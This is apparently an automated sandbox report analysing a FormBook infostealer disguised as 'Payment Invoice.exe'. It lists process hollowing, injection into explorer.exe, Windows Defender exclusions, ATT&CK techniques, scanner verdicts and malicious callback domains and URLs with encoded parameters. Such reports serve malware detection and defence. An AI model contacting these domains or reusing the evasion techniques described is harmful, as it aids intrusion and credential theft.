                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Users\user\Desktop\Payment Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected FormBookShow sources
                      Source: Yara matchFile source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE

                      Remote Access Functionality:

                      barindex
                      Yara detected FormBookShow sources
                      Source: Yara matchFile source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsShared Modules1Path InterceptionProcess Injection812Rootkit1Credential API Hooking1Query Registry1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Security Software Discovery321Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSVirtualization/Sandbox Evasion31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection812LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncSystem Information Discovery112Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 385452 Sample: Payment Invoice.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Multi AV Scanner detection for dropped file 2->52 54 12 other signatures 2->54 10 Payment Invoice.exe 5 2->10         started        process3 file4 36 C:\Users\user\AppData\...\Payment Invoice.exe, PE32 10->36 dropped 38 C:\...\Payment Invoice.exe:Zone.Identifier, ASCII 10->38 dropped 40 C:\Users\user\...\Payment Invoice.exe.log, ASCII 10->40 dropped 58 Writes to foreign memory regions 10->58 60 Allocates memory in foreign processes 10->60 62 Adds a directory exclusion to Windows Defender 10->62 64 Injects a PE file into a foreign processes 10->64 14 Payment Invoice.exe 10->14         started        17 powershell.exe 26 10->17         started        19 Payment Invoice.exe 10->19         started        signatures5 process6 signatures7 72 Modifies the context of a thread in another process (thread injection) 14->72 74 Maps a DLL or memory area into another process 14->74 76 Sample uses process hollowing technique 14->76 78 Queues an APC in another process (thread injection) 14->78 21 explorer.exe 14->21 injected 25 conhost.exe 17->25         started        process8 dnsIp9 42 www.the-techs.info 21->42 44 www.minterfortexas.com 21->44 46 ext-cust.squarespace.com 198.185.159.144, 49760, 80 SQUARESPACEUS United States 21->46 56 System process connects to network (likely due to code injection or exploit) 21->56 27 WWAHost.exe 21->27         started        30 autoconv.exe 21->30         started        signatures10 process11 signatures12 66 Modifies the context of a thread in another process (thread injection) 27->66 68 Maps a DLL or memory area into another process 27->68 70 Tries to detect virtualization through RDTSC time measurements 27->70 32 cmd.exe 1 27->32         started        process13 process14 34 conhost.exe 32->34         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Payment Invoice.exe33%VirustotalBrowse
                      Payment Invoice.exe29%ReversingLabsWin32.Trojan.Wacatac
                      Payment Invoice.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\Payment Invoice.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\Payment Invoice.exe29%ReversingLabsWin32.Trojan.Wacatac

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      14.2.Payment Invoice.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://crl.microsoft.co40%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://crl.microsoft0%URL Reputationsafe
                      http://crl.microsoft0%URL Reputationsafe
                      http://crl.microsoft0%URL Reputationsafe
                      https://go.micro0%URL Reputationsafe
                      https://go.micro0%URL Reputationsafe
                      https://go.micro0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://james.newtonking.com/projects/json0%URL Reputationsafe
                      http://james.newtonking.com/projects/json0%URL Reputationsafe
                      http://james.newtonking.com/projects/json0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      www.the-techs.info/chue/0%Avira URL Cloudsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ext-cust.squarespace.com
                      198.185.159.144
                      truefalse
                        high
                        www.minterfortexas.com
                        unknown
                        unknowntrue
                          unknown
                          www.the-techs.info
                          unknown
                          unknowntrue
                            unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            www.the-techs.info/chue/true
                            • Avira URL Cloud: safe
                            low

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://crl.microsoft.co4powershell.exe, 0000000B.00000003.788406161.0000000008D63000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.apache.org/licenses/LICENSE-2.0Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                              high
                              http://www.fontbureau.comPayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                high
                                http://www.fontbureau.com/designersGPayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers/?Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn/bThePayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://crl.microsoftpowershell.exe, 0000000B.00000003.788406161.0000000008D63000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers?Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                      high
                                      https://go.micropowershell.exe, 0000000B.00000003.790519826.0000000005AE1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.tiro.comexplorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designersexplorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.goodfont.co.krPayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://james.newtonking.com/projects/jsonPayment Invoice.exe, 00000001.00000002.720984105.00000000039B9000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.newtonsoft.com/jsonschemaPayment Invoice.exe, 00000001.00000002.720984105.00000000039B9000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.carterandcone.comlPayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.sajatypeworks.comPayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.typography.netDPayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNPayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cn/cThePayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmPayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://fontfabrik.comPayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.founder.com.cn/cnPayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/frere-user.htmlPayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.jiyu-kobo.co.jp/Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.galapagosdesign.com/DPleasePayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers8Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.%s.comPAexplorer.exe, 0000000F.00000002.911585809.0000000002B50000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                low
                                                http://www.fonts.comPayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.sandoll.co.krPayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.urwpp.deDPleasePayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.zhongyicts.com.cnPayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePayment Invoice.exe, 00000001.00000002.720684926.0000000002A45000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.sakkal.comPayment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    198.185.159.144
                                                    ext-cust.squarespace.comUnited States
                                                    53831SQUARESPACEUSfalse

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Emerald
                                                    Analysis ID:385452
                                                    Start date:12.04.2021
                                                    Start time:14:38:31
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 12m 15s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:Payment Invoice.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:26
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@13/8@2/1
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 16.8% (good quality ratio 15%)
                                                    • Quality average: 72.2%
                                                    • Quality standard deviation: 31.9%
                                                    HCA Information:
                                                    • Successful, ratio: 99%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                    • Excluded IPs from analysis (whitelisted): 92.122.145.220, 104.43.193.48, 13.88.21.125, 104.43.139.144, 20.50.102.62, 92.122.213.247, 92.122.213.194, 52.155.217.156, 2.20.142.210, 2.20.142.209, 20.54.26.129, 104.42.151.234, 20.82.210.154, 52.255.188.83, 52.147.198.201
                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    14:40:18API Interceptor20x Sleep call for process: powershell.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    198.185.159.144INQUIRY 1820521 pdf.exeGet hashmaliciousBrowse
                                                    • www.mobcitylabs.com/gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT
                                                    sgJRcWvnkP.exeGet hashmaliciousBrowse
                                                    • www.aldlan-studio.com/svh9/?EZA4iv=iUgadD8kb6gMm/UthcIeLrQXBXKqEwA1IwoQkb8SyhCa1CCH2tdbgVRBTGVl6GtCHz6WbdtHlg==&GzuLH=VBZtT83HH6GhB4
                                                    remittance info.xlsxGet hashmaliciousBrowse
                                                    • www.makingwaves.design/svh9/?5ja0c8yp=HlxAPFB4jZ3NXox3gOhW2mb89mcrhBqsxr7jk8SFshbVhphDLQeHIc6bZtAlCAGtmfvtHQ==&2dn4M=z4DhUBy8
                                                    36ne6xnkop.exeGet hashmaliciousBrowse
                                                    • www.totally-seo.com/p2io/?1bVpY=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MoCWZBvIMUw&TVg8Ar=tFNd1Vlhj2qp
                                                    mW07jhVxX5.exeGet hashmaliciousBrowse
                                                    • www.creationsbyjamie.com/nsag/?Jry=uVd8K&MHQD=ikjZmpp02NVieHaNLwg8/vzbnsAf6IhlNdOODdzSNMaisic822ysYeH69uqv2TJux/MF
                                                    NEW ORDER ELO-05756485.exeGet hashmaliciousBrowse
                                                    • www.gammacake.com/riai/?Tj=WtQWSOTzj6QeB4pNJBVQ9tU2A2vUwP0QAZgX7UMYEeL+qDlhyiyE4waWUtaNiZ+URiEIlTuTIg==&RX=dhutZbdHWPcd4ls
                                                    PO45937008ADENGY.exeGet hashmaliciousBrowse
                                                    • www.theskineditco.com/mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl
                                                    LWlcpDjYIQ.exeGet hashmaliciousBrowse
